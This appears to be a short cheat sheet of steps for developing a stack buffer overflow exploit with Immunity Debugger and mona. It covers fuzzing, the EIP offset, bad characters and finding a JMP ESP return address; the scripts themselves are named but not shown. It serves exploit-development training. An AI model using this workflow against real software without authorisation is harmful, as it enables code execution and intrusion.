-
Open inmunity debugger as administrator and open exe
-
Set mona working dir :
!mona config -set workingfolder c:\\mona\\
- Run Fuzzer Script
Fuzzer Script
- Generate pattern with last value + 100/200 from Fuzzer script with mona :
!mona pattern_create 2000
- Copy the pattern from the filesystem and append it to the pattern script
Pattern Script
- After running pattern , copy EIP value and run mona to obtain offset
!mona pattern_offset <EIP_value>
- Obtain badchar list with mona, already skipping \x00 and run badchar script
!mona bytearray -b "\\x00"
Badchar
- Now there are two options to identify badchars, first one click ESP and follow in dump, then see which chars seem to be outliers. Second one , run the following mona command, probably consecutive badchars, only first one is valid, then remove them and recheck.
!mona compare -f C:\\mona\\bytearray.bin -a <ESP_addr>
- Obtain return address with mona
!mona jmp -r esp
#If Fails, filter by addresses which do not contain badchars
!mona jmp -r esp -cpb "\\x00"
Then convert it to little endian
Addr = 625011AF
retn = "\\xAF\\x11\\x50\\x62"